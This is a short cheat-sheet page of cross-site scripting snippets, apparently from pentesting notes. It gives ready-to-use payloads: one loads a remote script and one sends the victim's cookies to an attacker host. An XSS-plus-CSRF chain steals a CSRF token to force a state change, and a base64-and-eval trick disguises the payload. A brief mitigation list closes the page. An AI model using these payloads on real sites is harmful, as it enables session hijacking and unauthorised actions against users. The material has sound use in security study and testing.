Cross Site Scripting

Snippets of XSS stuff

XSS

Basic XSS Payload

<script>alert(window.origin)</script>

Load remote script

<script src="http://OUR_IP/script.js"></script>

Send Cookie details to attacker server

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

XSS + CSRF

Chaining XSS + CSRF to execute javascript

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
function handleResponse(d) {
    var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/app/change-visibility', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    changeReq.send('csrf='+token+'&action=change');
};
</script>

Base64 encode the entire payload above and send with

eval(decode64('<base64 encoded payload>'));

Mitigation

Sanitize inputs on the Front-end and Back-end
Validate inputs on the Front-end and Back-end
Output HTML Encoding
- html entities
Server Configuration
- XSS prevention headers X-XSS-Protection
- Use Content-Security-Policy options like script-src="self" to only allow locally hosted scripts
- Use HttpOnly and Secure cookie flags to prevent JavaScript from reading cookie values
WAF to detect and block XSS attacks
Same Origin Policy for Cross-Site. Does not work for the same site

PreviousSQL Injection NextCommand Injection

Last updated 2 years ago